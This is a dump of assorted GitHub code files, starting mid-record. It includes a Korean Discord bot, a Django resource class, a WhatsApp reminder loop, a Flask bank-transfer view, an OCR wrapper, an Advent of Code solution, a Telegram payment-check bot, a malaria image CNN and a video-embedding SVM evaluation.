\")\r\n servername = b[0]\r\n noticeid = b[1]\r\n c = b[2]\r\n user = c[2:-1]\r\n file = str(noticeid) + '-' + servername + '.txt'\r\n if os.path.isfile(file):\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'rt')\r\n s = f.read()\r\n users = s[:-1].split(\",\")\r\n for u in users:\r\n if u == user:\r\n await message.channel.send('이미 추가되어 있는 멤버예요!')\r\n return\r\n\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'a+t')\r\n f.write(user + \",\")\r\n f.close()\r\n await message.channel.send('\"' + str(client.get_user(int(user))) + '\" 멤버가 \"' + servername + '\" 서버의 \"' + noticeid + '\" 공지에 성공적으로 추가되었습니다.')\r\n return\r\n else:\r\n await message.channel.send('이런, 일치하는 공지가 없네요...')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b deletereactionuser '):\r\n a = message.content[22:]\r\n b = a.split(\" \")\r\n servername = b[0]\r\n print(servername)\r\n noticeid = b[1]\r\n print(noticeid)\r\n c = b[2]\r\n user = c[2:-1]\r\n print(user)\r\n file = str(noticeid) + '-' + servername + '.txt'\r\n print(file)\r\n if os.path.isfile(file):\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'rt')\r\n s = f.read()\r\n users = s[:-1].split(\",\")\r\n users = list(set(users))\r\n try:\r\n users.remove(user)\r\n except ValueError:\r\n await message.channel.send('\"' + str(client.get_user(int(user))) + '\" 멤버는 \"' + servername + '\" 서버의 \"' + noticeid + '\" 공지에 추가 되어 있지 않아요!')\r\n return\r\n\r\n f.close()\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'wt')\r\n f.write(\",\".join(users) + \",\")\r\n f.close()\r\n await message.channel.send('\"' + str(client.get_user(int(user))) + '\" 멤버가 \"' + servername + '\" 서버의 \"' + noticeid + '\" 공지의 reactionuser 목록에서 삭제되었습니다.')\r\n return\r\n\r\n else:\r\n await message.channel.send('이런, 일치하는 공지가 없네요...')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b resetreactionuser '):\r\n a = message.content[21:]\r\n b = a.split(\" \")\r\n servername = b[0]\r\n noticeid = b[1]\r\n file = str(noticeid) + '-' + servername + '.txt'\r\n if os.path.isfile(file):\r\n os.remove(file)\r\n await message.channel.send('\"' + servername + '\" 서버의 \"' + noticeid + '\" 공지의 reactionuser 파일을 성공적으로 초기화 하였습니다.')\r\n return\r\n else:\r\n await message.channel.send('해당하는 공지의 reactionuser 파일이 없습니다만...')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b shutdown'):\r\n await message.channel.send('{ STARTING SHUTDOWN }')\r\n await message.channel.send('Shutdown Progress : 0%')\r\n if str(message.author.id) == developer_id:\r\n await message.channel.send('Shutdown Progress : 40%')\r\n await message.author.send('Enter password to access Developer Commands.')\r\n try:\r\n def check(m):\r\n return m.author == message.author\r\n await message.channel.send('Shutdown Progress : 80%')\r\n msg = await client.wait_for('message', check=check, timeout=15.0)\r\n except asyncio.TimeoutError:\r\n await message.channel.send('Failed to access shutdown that is Developer command : TIMEOUT')\r\n return\r\n else:\r\n if msg.content == access_password:\r\n await message.channel.send('Succeeded to access shutdown that is Developer command')\r\n await message.channel.send('Shutdown Progress : 100%')\r\n await message.channel.send('{ FINISHED SHUTDOWN }')\r\n sys.exit()\r\n else:\r\n await message.channel.send('Failed to access shutdown that is Developer command : INVALID PASSWORD')\r\n return\r\n\r\n else:\r\n await message.channel.send('Failed to access shutdown that is Developer command : PERMISSION ERROR')\r\n return\r\n\r\n elif message.content.startswith('&b startupdate '):\r\n if str(message.author.id) == developer_id:\r\n await message.author.send('Enter password to access Developer Commands.')\r\n try:\r\n def check(m):\r\n return m.author == message.author\r\n msg = await client.wait_for('message', check=check, timeout=15.0)\r\n except asyncio.TimeoutError:\r\n await message.author.send('Failed to access shutdown that is Developer command : TIMEOUT')\r\n return\r\n else:\r\n if msg.content == access_password:\r\n await message.author.send('Succeeded to access shutdown that is Developer command')\r\n a = message.content[15:]\r\n b = a[2:-1]\r\n ch = client.get_channel(int(b))\r\n await ch.send('<@569467294376394762> 업데이트를 시작합니다.')\r\n update_is = 1\r\n f = open('update.txt', 'w+t')\r\n f.write(str(update_is))\r\n f.close()\r\n return\r\n else:\r\n await message.author.send('Failed to access shutdown that is Developer command : INVALID PASSWORD')\r\n return\r\n\r\n else:\r\n await message.channel.send('Failed to access shutdown that is Developer command : PERMISSION ERROR')\r\n return\r\n\r\n elif message.content.startswith('&b finishupdate '):\r\n if str(message.author.id) == developer_id:\r\n await message.author.send('Enter password to access Developer Commands.')\r\n try:\r\n def check(m):\r\n return m.author == message.author\r\n msg = await client.wait_for('message', check=check, timeout=15.0)\r\n except asyncio.TimeoutError:\r\n await message.author.send('Failed to access shutdown that is Developer command : TIMEOUT')\r\n return\r\n else:\r\n if msg.content == access_password:\r\n await message.author.send('Succeeded to access shutdown that is Developer command')\r\n a = message.content[16:]\r\n b = a[2:-1]\r\n ch = client.get_channel(int(b))\r\n await ch.send('<@569467294376394762> 업데이트가 완료되었습니다.')\r\n update_is = 0\r\n f = open('update.txt', 'w+t')\r\n f.write(str(update_is))\r\n f.close()\r\n return\r\n else:\r\n await message.author.send('Failed to access shutdown that is Developer command : INVALID PASSWORD')\r\n return\r\n\r\n else:\r\n await message.channel.send('Failed to access shutdown that is Developer command : PERMISSION ERROR')\r\n return\r\n\r\n else:\r\n await message.channel.send('알 수 없는 구문이네요...')\r\n return\r\n else:\r\n return\r\n\r\n\r\naccess_token = os.environ[\"ACCESS_TOKEN\"]\r\nclient.run(access_token)\r\n","repo_name":"Bukgeuk/BukgeukBOT","sub_path":"BukgeukBOT.py","file_name":"BukgeukBOT.py","file_ext":"py","file_size_in_byte":24885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14577684304","text":"from django.conf.urls import defaults as urls\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nfrom django import http\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response, get_object_or_404\n\nfrom jpic import voodoo\nfrom jpic import tree\n\nfrom exceptions import *\n\nclass ResourceBase(voodoo.ppi):\n \"\"\"\n The base resource is like a controller in .\n\n It has his own set of actions, urls, and methods to generate a response.\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Instanciate and validates the resource.\n\n :param inline: Resource that invokes this instance as an inline.\n :param parent: ResourceNode that manages routes to this resource.\n :param is_running: True when run() does self respawn.\n \"\"\"\n if 'inline' not in kwargs:\n self.inline = None\n if 'parent' not in kwargs:\n self.parent = None\n if 'is_running' not in kwargs:\n self.is_running = False\n\n # call the parent to set each kwarg as a property\n super(ResourceBase, self).__init__(**kwargs)\n\n if self.inline:\n # reference to the \"running\" context\n self.request = self.inline.request\n\n # backup kwargs for get_url\n #TODO blacklist request specific stuff be default (not hardcode)\n self.kwargs = kwargs\n\n # validate resource\n if not self._hasanyof(['model_class', 'name', 'urlname']):\n raise UnnamedResourceException(kwargs)\n\n self.validate()\n\n # back up any variable to kwargs\n for kwarg in self.add_to_kwargs:\n self.kwargs[kwarg] = getattr(self, kwarg)\n\n def validate(self):\n if self._has('name') and not self._has('urlname'):\n self.urlname = self.name\n elif self._has('urlname') and not self._has('name'):\n self.name = self.urlname\n\n @classmethod\n def instanciate(self, **kwargs):\n \"\"\"\n Return a new instance of the resource, with the givin kwargs \n \n Used by run()\n \"\"\"\n return self(**kwargs)\n\n @classmethod\n def run(self, request, *args, **kwargs):\n \"\"\"\n This method should instanciate a resource, check if permissions\n are OK, run the action and return a response.\n\n If the action doesn't return a response (instance of\n django.http.HttpResponse), then self.get_response will be called\n through self.response.\n\n This allows to cache responses.\n \"\"\"\n self = self.instanciate(is_running=True, request=request, **kwargs)\n\n # do permission check after setup, but before\n # action call. This means you should not do\n # any critical model update/deletion before self.action()\n if not self.permission:\n return http.HttpResponseForbidden()\n\n # Run the action\n # It can override anything that was set by run()\n response = self.action()\n\n if isinstance(response, http.HttpResponse):\n return response\n\n return self.response\n\n def get_urls(self): \n \"\"\"\n Returns a url.patterns for all actions.\n\n This is configurable by setting options to an action method, ie:\n details = setopt(details, urlname='details', urlregex=r'^(?P.+)/$')\n\n Other options are settable, but only urlname and urlregex are used here.\n \"\"\"\n urlpatterns = urls.patterns('')\n for action_method_name in self.actions_names:\n action = getattr(self, action_method_name)\n if hasattr(action, 'decorate'):\n action = self.decorate_action(action)\n\n # name and regex are action function attributes\n if hasattr(action, 'urlname') and hasattr(action, 'urlregex'):\n urlname = action.urlname\n urlregex = action.urlregex\n name = ''\n if self.parent:\n name += self.parent.urlname + '_'\n name += self.urlname + '_'\n name += urlname\n urlpatterns += urls.patterns('', \n urls.url(urlregex,\n self.__class__.run,\n name=name,\n kwargs=dict(action_method_name=action_method_name, **self.kwargs),\n )\n )\n return urlpatterns\n\n def get_add_to_kwargs(self):\n \"\"\"\n List of instance properties to copy to self.kwargs, done in __init__.\n\n For performance purposes, its possible to add values that are for example\n reversed from models definitions: get_formset_field_objects etc ...\n \"\"\"\n return []\n\n def root_url(self):\n \"\"\"\n Return the root url of the resource.\n\n It is not supposed to be hard coded.\n It prepends the urlname of the parent to its own urlname.\n \"\"\"\n #TODO make recursive parent check\n if self.parent:\n return \"/%s/%s\" % (self.parent.urlname, self.urlname)\n else:\n return \"/%s\" % self.urlname\n\n def get_context(self):\n \"\"\"\n Returns the context to use as base.\n \n By default, this adds the following variables:\n - resource is the instance,\n - media is self.media,\n - jsites_media_prefix is settings.JSITES_MEDIA_PREFIX\n - tree is self.tree or the paren't.\n - parent is the parent instance if any.\n \"\"\"\n context = {\n 'resource': self,\n 'media': self.media,\n 'jsites_media_prefix': settings.JSITES_MEDIA_PREFIX,\n }\n if self.parent:\n context['parent'] = self.parent\n context['tree'] = self.parent.tree\n else:\n context['tree'] = self.tree\n return context\n\n def add_to_context(self, name):\n \"\"\"\n Copies a variable from this instance to self.context\n \"\"\"\n self.context[name] = getattr(self, name)\n\n def get_permission(self, user=None, action_name=None, kwargs={}): # {{{ permissions\n \"\"\"\n Wraps around check_permission, setting resource instance defaults\n \"\"\"\n if not self.is_running and not user and not action_name:\n raise Exception(\"Not giving away a permission without action_name and user kwargs if not running\")\n\n if not action_name:\n action_name = self.action_name\n if not user:\n user = self.request.user\n if not kwargs:\n kwargs = self.kwargs\n\n return self.check_permission(user, action_name, kwargs)\n\n def check_permission(self, user, action_name, kwargs):\n \"\"\"\n Checks if a user can request an action with specified kwargs\n \"\"\" \n return True\n # }}}\n# {{{ action_url, action, action_name, action_method_name\n def get_action_method_name(self):\n if 'action_method_name' in self.kwargs:\n return self.kwargs['action_method_name']\n else:\n return self.action_name\n\n def get_action_name(self):\n if 'action_name' in self.kwargs:\n return self.kwargs['action_name']\n else:\n return self.action_method_name\n\n def get_action(self):\n return getattr(self, self.action_name)\n\n def get_action_url(self, action_name=None, kwargs=[]):\n if not action_name:\n if not self.is_running:\n raise Exception(\"Not giving an action url, for the current action if none is actually running\")\n\n action_name = self.action_name\n\n if self.parent:\n prefix = \"%s_%s_\" % (self.parent.urlname, self.urlname)\n else:\n prefix = \"%s_\" % self.urlname\n\n self.kwargs.update(kwargs)\n return reverse(prefix+action_name, kwargs=kwargs)\n \n def get_actions_names(self):\n return []\n # }}}\n # {{{ template, response\n def get_template(self):\n if not hasattr(self, 'action'):\n fallback = (\n '%s/index.html' % self.urlname,\n 'index.html',\n )\n else:\n fallback = (\n '%s/%s.html' % (self.urlname, self.action.__name__),\n '%s.html' % self.action.__name__,\n )\n return fallback\n\n def get_response(self):\n return render_to_response(\n self.template,\n self.context,\n context_instance=RequestContext(self.request)\n )\n # }}}\n def get_media_path(self):\n return None\n def get_media(self):\n return voodoo.converter(js=self.js, css=self.css)\n def get_js(self):\n if self.parent:\n return self.parent.js\n return []\n def get_css(self):\n if self.parent:\n return self.parent.css\n return {\n 'all': [],\n 'screen': [],\n 'projection': [],\n }\n def get_tree_items(self):\n \"\"\"\n Optionnaly recursive dict of verbose_name -> url\n \n By default, it checks for the verbose_name option of all method names\n declared in this class actions, and uses get_action_url(action_method_name)\n to reverse the action url.\n \"\"\"\n items = {}\n # try to add each action by default\n for action_method_name in self.actions_names:\n items[unicode(getattr(getattr(self, action_method_name), 'verbose_name'))] = self.get_action_url(action_method_name)\n return items\n\n def get_tree(self):\n \"\"\" Append all tree items to the parent tree, or a new tree instance \"\"\"\n if self.parent:\n return self.parent.tree\n else:\n navtree = tree.BaseTree()\n\n return tree.LinkTreeFactory(self.tree_items, navtree).tree\n","repo_name":"jpic/jsites","sub_path":"resources/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":9854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"9521264527","text":"import requests\nimport time\nimport datetime\nimport logging\n\nfrom db import User, Message, MessageSenderRegistry\n\nTEMPLATE_URL = \"https://api.callmebot.com/whatsapp.php?phone={phone}&text={text}&apikey={apikey}\"\n\nwhile True:\n for user in User.get_users():\n phone = user.phone\n api_key = user.api_key\n\n for registry in MessageSenderRegistry.get_registry_by_username(username=user.username):\n if not registry.MessageSenderRegistry.is_sent:\n if datetime.datetime.now() > registry.MessageSenderRegistry.sending_time:\n url = TEMPLATE_URL.format(\n phone=phone,\n text=registry.Message.text,\n apikey=api_key\n )\n\n session = requests.Session()\n session.trust_env = False\n\n response = session.get(url=url)\n response_message = str(response.content)\n\n if \"ERROR\" in response_message:\n logging.warning(url)\n logging.warning(response_message)\n elif registry.MessageSenderRegistry.is_repeating:\n MessageSenderRegistry.update_table(\n {\n \"id\": registry.MessageSenderRegistry.id,\n \"sending_time\": datetime.datetime.now() + datetime.timedelta(\n minutes=registry.MessageSenderRegistry.repeating_interval\n )\n }\n )\n else:\n MessageSenderRegistry.update_table(\n {\n \"id\": registry.MessageSenderRegistry.id,\n \"is_sent\": True\n }\n )\n\n time.sleep(60)\n","repo_name":"jack-brolin/raspberry-pi-4","sub_path":"wapp-reminder-bot/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22021387736","text":"from flask import render_template, url_for, flash, redirect, request, Blueprint\nfrom bank import app, conn, bcrypt\nfrom bank.forms import TransferForm\nfrom flask_login import current_user\nfrom bank.models import select_user_accounts, transfer_account\nimport datetime\n\n\n\nUser = Blueprint('User', __name__)\n\n@User.route(\"/transfer\", methods=['GET', 'POST'])\ndef transfer():\n if not current_user.is_authenticated:\n flash('Please Login.','warning')\n return redirect(url_for('Login.login'))\n \n\n Username = current_user.get_id()\n print(Username)\n\n dropdown_accounts = select_user_accounts(current_user.get_id())\n drp_accounts = []\n for drp in dropdown_accounts:\n drp_accounts.append((drp[0], drp[1]))\n print(drp_accounts)\n form = TransferForm()\n form.sourceAccount.choices = drp_accounts\n form.targetAccount.choices = drp_accounts\n if form.validate_on_submit():\n date = datetime.date.today()\n amount = form.amount.data\n from_account = form.sourceAccount.data\n to_account = form.targetAccount.data\n transfer_account(date, amount, from_account, to_account)\n flash('Transfer succeed!', 'success')\n return redirect(url_for('Login.home'))\n return render_template('transfer.html', title='Transfer', drop_cus_acc=dropdown_accounts, form=form)\n","repo_name":"emiloerum/DIS_GroupProject","sub_path":"DIS_bankProject/bank/User/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16912012504","text":"\"\"\"Write a Python function that takes a list and returns a new list with unique elements of the first list. Go to the editor\nSample List : [1,2,3,3,3,3,4,5]\nUnique List : [1, 2, 3, 4, 5]\"\"\"\n\ndef unique(l):\n s = set(l)\n return list(s)\n\nl = list(map(int,input().split()))\nprint(unique(l))","repo_name":"nekapoor7/Python-and-Django","sub_path":"PythonNEW/Function/UniqueElements.py","file_name":"UniqueElements.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29092862428","text":"import os\nfrom os.path import (join, splitext, exists)\nfrom c19mining.utils import (mkdir, explore_dir)\nimport pdf2image\ntry:\n from PIL import Image\nexcept ImportError:\n import Image\nimport pytesseract\n\nclass TesseOCR(object):\n \"\"\"An Optical Character Recognition class based on tesseract\"\"\"\n def __init__(self, lang):\n super(TesseOCR, self).__init__()\n self.lang = lang if lang else 'eng'\n\n def get_text_from_pdf(self, pdf_path):\n \"\"\"convert a pdf file into text\"\"\"\n text = ''\n images = pdf2image.convert_from_path(pdf_path)\n for pg, img in enumerate(images):\n text += pytesseract.image_to_string(img)\n return text\n\n def get_text_from_jpg(self, image_path):\n \"\"\"convert a jpg image into text\"\"\"\n try:\n img = Image.open(image_path)\n except Exception as e:\n raise e\n text = pytesseract.image_to_string(img, lang=self.lang)\n return text\n\n def parse_book(self, book_path, out_text):\n mkdir(book_path, 'texts')\n for (image_page, fname) in explore_dir(book_path, yield_extension='jpg'):\n bname = splitext(fname)[0]\n text_path = join(out_text, 'texts', bname+'.txt')\n if exists(text_path):\n continue\n try:\n t = self.get_text_from_jpg(image_page)\n except Exception as e:\n t = ''\n\n if len(t) > 0:\n with open(text_path, 'w') as f:\n f.write(t)\n print('Created', text_path)\n","repo_name":"alemol/covidminer","sub_path":"c19mining/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28025683071","text":"from database import Operation\nfrom qiwi import Qiwi\nfrom config import token_telegram, token_qiwi, number\nimport telebot\nfrom telebot import types\n\nbot = telebot.TeleBot(token_telegram)\n\n\n@bot.message_handler(commands=['start', 'help'])\ndef send_welcome(message):\n keyboard = types.ReplyKeyboardMarkup(row_width=2, resize_keyboard=True)\n action = types.KeyboardButton(text=\"Проверить\")\n keyboard.add(action)\n bot.send_message(message.chat.id,\n f\"Для покупки аккаунта вам необходимо отправить 100р на данный\"\n f\" qiwi кошелек {number} с комментарием {message.from_user.id}.\"\n f\" После чего нажать на кнопку 'Проверить' и ожидать последующей \"\n f\"информации\"\n , reply_markup=keyboard)\n\n\n@bot.message_handler(regexp=\"Проверить\")\ndef handle_message(message):\n check = Qiwi(token_qiwi)\n elements_to_check = check.find_pay(str(message.from_user.id), check.get_history())\n # print(elements_to_check)\n if elements_to_check['total']['amount'] == 10 and elements_to_check['total']['currency'] == 643:\n my_database = Operation()\n if my_database.select(str(message.from_user.id), elements_to_check['date']):\n bot.send_message(message.chat.id, f'Новых платежей от вас не поступало')\n else:\n my_database.commit(str(message.from_user.id),elements_to_check['date'])\n bot.send_message(message.chat.id, f'Логин:{12}\\nПароль:{1}')\n else:\n bot.send_message(message.chat.id, 'Ожидаются данный')\n\n\n\n\nbot.polling()\n","repo_name":"paramoun1h/telegram_seller","sub_path":"main_application.py","file_name":"main_application.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29100077012","text":"import re\n\n\ndef read_text(datafile):\n with open(datafile, 'r') as f:\n text = f.read()\n f.close()\n return text\n\n\ndef find_marker(text, index='all'):\n regex = re.compile(r'\\((\\d+)x(\\d+)\\)')\n if index is not 'all':\n return regex.match(text, index)\n else:\n return re.search(regex.pattern, text)\n\n\ndef decompress(text):\n result = ''\n i = 0\n while i < len(text):\n match = find_marker(text, i)\n if match:\n start = int(match.end())\n end = start + int(match.group(1))\n n = int(match.group(2))\n chunk = text[start: end]\n result += chunk * n\n i = start + len(chunk)\n else:\n result += text[i]\n i += 1\n return result\n\n\ndef full_decompress(text):\n '''\n It works for resonably sized strings (e.g. the test cases).\n It would too long to run on test input so implemented Peter Norvigs\n strategy (not shown here) simply to get an answer, but again, this works\n ... you just need a super computer.\n '''\n markers = find_marker(text)\n result = text\n while markers:\n result = decompress(result)\n markers = find_marker(result)\n return result\n\n\ndef norvig(text):\n length = 0\n i = 0\n while i < len(text):\n match = find_marker(text, i)\n if match:\n interval, n = map(int, match.groups())\n i = int(match.end())\n length += n * norvig(text[i: i + interval])\n i += interval\n else:\n length += 1\n i += 1\n return length\n\n\ndef main():\n # Part 1\n print(len(decompress(read_text('input9.txt'))))\n # Part 2\n # print(len(full_decompress(read_text('input9.txt'))))\n print(norvig(read_text('input9.txt')))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jrjed/advent_of_code_2016","sub_path":"day9/script9.py","file_name":"script9.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9209213639","text":"import cv2\r\nimport numpy as np\r\nimport os\r\nfrom random import shuffle\r\nfrom tqdm import tqdm\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport tflearn\r\nfrom tflearn.layers.conv import conv_2d, max_pool_2d\r\nfrom tflearn.layers.core import input_data, dropout, fully_connected\r\nfrom tflearn.layers.estimator import regression\r\n\r\n\r\nTRAIN_DIR = 'C:\\\\Users\\\\user\\\\Downloads\\\\project\\\\cell_images\\\\cell_images\\\\com'\r\nTEST_DIR = 'C:\\\\Users\\\\user\\\\Downloads\\\\project\\\\test'\r\nIMG_SIZE = 100\r\nLR = 1e-3\r\nMODEL_NAME = 'maleria'\r\ndef create_label(image_name) :\r\n\tworld_label = image_name[0]\r\n\tif world_label == '1':\r\n\t\treturn np.array([1,0])\r\n\telif world_label == '0':\r\n\t\treturn np.array([0,1])\r\n\r\n\r\ndef create_train_data():\r\n\ttraining_data = []\r\n\tfor img in tqdm(os.listdir(TRAIN_DIR)):\r\n\t\tpath = os.path.join(TRAIN_DIR, img)\r\n\t\timg_data = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\r\n\t\t#img_data = cv2.resize(img_data, (IMG_SIZE, IMG_SIZE))\r\n\t\ttraining_data.append([np.array(img_data), create_label(img)])\r\n\tshuffle(training_data)\r\n\tnp.save('train_data.npy', training_data)\r\n\treturn training_data\r\n\r\n\r\ndef create_test_data():\r\n\ttesting_data = []\r\n\tfor img in tqdm(os.listdir(TEST_DIR)):\r\n\t\tpath = os.path.join(TEST_DIR, img)\r\n\t\timg_num = (img.split('.'))[0][0]\r\n\t\timg_data = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\r\n\t\t#img_data = cv2.resize(img_data, (IMG_SIZE, IMG_SIZE))\r\n\t\ttesting_data.append([np.array(img_data), img_num])\r\n\tshuffle(testing_data)\r\n\tnp.save('test_data.npy', testing_data)\r\n\treturn testing_data\r\n\t \r\n\r\ntrain_data = create_train_data()\r\ntest_data = create_test_data()\r\n\r\ntrain = train_data[:-500]\r\ntest = train_data[-500:]\r\nX_train = np.array([i[0] for i in train]).reshape(-1, IMG_SIZE, IMG_SIZE, 1)\r\ny_train = [i[1] for i in train]\r\nX_test = np.array([i[0] for i in test]).reshape(-1, IMG_SIZE, IMG_SIZE, 1)\r\ny_test = [i[1] for i in test]\r\n \r\ndef create_model():\r\n tf.reset_default_graph()\r\n convnet = input_data(shape=[None, IMG_SIZE, IMG_SIZE, 1], name='input')\r\n convnet = conv_2d(convnet, 32, 5, activation='relu')\r\n convnet = max_pool_2d(convnet, 5)\r\n convnet = conv_2d(convnet, 64, 5, activation='relu')\r\n convnet = max_pool_2d(convnet, 5)\r\n convnet = conv_2d(convnet, 128, 5, activation='relu')\r\n convnet = max_pool_2d(convnet, 5)\r\n convnet = conv_2d(convnet, 64, 5, activation='relu')\r\n convnet = max_pool_2d(convnet, 5)\r\n convnet = conv_2d(convnet, 32, 5, activation='relu')\r\n convnet = max_pool_2d(convnet, 5)\r\n convnet = fully_connected(convnet, 1024, activation='relu', name='d1')\r\n convnet = dropout(convnet, 0.8)\r\n convnet = fully_connected(convnet, 2, activation='softmax')\r\n convnet = regression(convnet, optimizer='adam', learning_rate=LR, loss='categorical_crossentropy', name='targets')\r\n model = tflearn.DNN(convnet, tensorboard_dir='log', tensorboard_verbose=3)\r\n return model\r\n\r\nmodel=create_model()\r\nmodel.fit({'input': X_train}, {'targets': y_train}, n_epoch=13, validation_set=({'input': X_test}, {'targets': y_test}), snapshot_step=500, show_metric=True, run_id=MODEL_NAME)\r\nmodel.save('C:\\\\Users\\\\user\\\\Downloads\\\\project\\\\model.tfl')\r\n\r\ndense1_vars = tflearn.variables.get_layer_variables_by_name('d1')\r\nprint(\"Dense1 layer weights:\")\r\nprint(model.get_weights(dense1_vars[0]))\r\n\r\nfig = plt.figure(figsize=(16, 12))\r\n\r\nfor num, data in enumerate(test_data[:16]):\r\n\r\n\timg_num = data[1]\r\n\timg_data = data[0]\r\n\r\n\ty = fig.add_subplot(4, 4, num + 1)\r\n\torig = img_data\r\n\tdata = img_data.reshape(IMG_SIZE, IMG_SIZE, 1)\r\n\tmodel_out = model.predict([data]) [0]\r\n\r\n\tif np.argmax(model_out) == 1:\r\n\t\tstr_label = 'Not Infected' + img_num\r\n\telse:\r\n\t\tstr_label = 'Infected' + img_num\r\n\r\n\ty.imshow(orig, cmap='gray')\r\n\tplt.title(str_label)\r\n\ty.axes.get_xaxis().set_visible(False)\r\n\ty.axes.get_yaxis().set_visible(False)\r\nplt.show()\r\n","repo_name":"pcvinayak/micro-organism-detector","sub_path":"nn3.py","file_name":"nn3.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44490183022","text":"from keras.models import Model, load_model\nfrom keras.layers import Input, Reshape, TimeDistributed\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score\nimport ffmpeg\nimport numpy as np\nfrom data import Data\nimport random\nfrom tabulate import tabulate\nfrom matplotlib import pyplot as plt\nfrom generator import MyGenerator\nimport os\n\nCHUNK_SIZE = 20\nMODEL_NO = 5\nDECODER_LENGTH = 10\nEMBEDDING_SIZE = 625\n\nFILE_APPENDIX = \"\"\n\ndef load_model_encoder(inputs, number=0, cnn_decoder_length=10):\n cnn_model = load_model(\"models/model_cnn_run\" + str(number) + \".h5\")\n cnn_encoder = Model(cnn_model.inputs, cnn_model.layers[-cnn_decoder_length].output)\n \n time_cnn = TimeDistributed(cnn_encoder)(inputs)\n\n reshape = Reshape((19, EMBEDDING_SIZE))(time_cnn)\n\n lstm_model = load_model(\"models/model_lstm_predict_run\" + str(number) + \".h5\")\n lstm_encoder = Model(lstm_model.inputs, lstm_model.layers[-3].output)\n\n embedding = lstm_encoder(reshape)\n return Model(inputs, embedding)\n \n\nbig_X = []\nbig_y = []\n\n# if there exists preprocessed data for the specified model, we don't have to process it again\nif (os.path.isfile(\"preprocessed/embedding\" + FILE_APPENDIX + str(MODEL_NO) + \".npy\") \n and os.path.isfile(\"preprocessed/labels\" + FILE_APPENDIX + str(MODEL_NO) + \".npy\")):\n\n big_X = np.load(\"preprocessed/embedding\" + FILE_APPENDIX + str(MODEL_NO) + \".npy\")\n big_y = np.load(\"preprocessed/labels\" + FILE_APPENDIX + str(MODEL_NO) + \".npy\")\n print(\"Loaded preprocessed file.\")\nelse:\n # preprocess the data by running it through our models\n input_dims = (19, 400, 400, 1)\n inputs = Input(shape=input_dims)\n\n my_model = load_model_encoder(inputs, MODEL_NO, DECODER_LENGTH)\n my_model.summary()\n\n data_set = np.load(\"prepared_ids.npy\")\n\n chunks = int(len(data_set) / CHUNK_SIZE)\n print(\"Datensatz: \" + str(len(data_set)))\n print(\"Chunks: \" + str(chunks))\n\n data_set = data_set[: chunks * CHUNK_SIZE]\n\n print(\"Getrimmter Datensatz: \" + str(len(data_set)))\n\n for i in range(chunks):\n X = []\n current_data = data_set[i*CHUNK_SIZE:(i+1)*CHUNK_SIZE]\n for file in current_data:\n out, _ = (\n\t ffmpeg\n\t .input(file)\n\t .output('pipe:', format='rawvideo', pix_fmt='gray')\n\t .run(quiet=True)\n )\n video = (\n\t np\n\t .frombuffer(out, np.uint8)\n\t .reshape([20, 400, 400, 1])\n )\n X.append((video/255)[:19])\t\n if \"calving\" in file:\n #calved_count += 1\n big_y.append(0)\n else:\n #random_count += 1\n big_y.append(1)\n print(file)\n\n \n print(np.shape(X))\n video_origin = np.array(X)\n\n embedding = my_model.predict(video_origin)\n embedding = embedding.reshape(-1, 16)\n print(np.shape(embedding))\n\n big_X.extend(embedding)\n print(\"Shape of big_X: \" + str(np.shape(big_X)))\n\n np.save(\"preprocessed/embedding\" + FILE_APPENDIX + str(MODEL_NO), big_X)\n np.save(\"preprocessed/labels\" + FILE_APPENDIX + str(MODEL_NO), big_y)\n\n print(np.shape(big_y))\n print(\"Amount zeros: \" + str(big_y.count(0)))\n print(\"Amount ones: \" + str(big_y.count(1)))\n\ntestsize = int(len(big_X) / 10)\n\naccuracy_scores = np.zeros(10)\n\nfor i in range(10):\n X_train = [*big_X[: i * testsize], *big_X[(i+1) * testsize :]]\n X_test = big_X[i * testsize : (i+1) * testsize]\n\n y_train = [*big_y[: i * testsize], *big_y[(i+1) * testsize :]]\n y_test = big_y[i * testsize : (i+1) * testsize]\n\n clf = SVC(kernel=\"rbf\")\n clf.fit(X_train, y_train)\n\n y_pred = clf.predict(X_test)\n accuracy_scores[i] = accuracy_score(y_test, y_pred)\n\nprint(\"Accuracy Scores: \" + str(accuracy_scores))\nprint(\"Average: \" + str(np.average(accuracy_scores)))\n\n","repo_name":"Committener-Gordon/code","sub_path":"stats/eval_cnn_lstm_predict_svm.py","file_name":"eval_cnn_lstm_predict_svm.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} 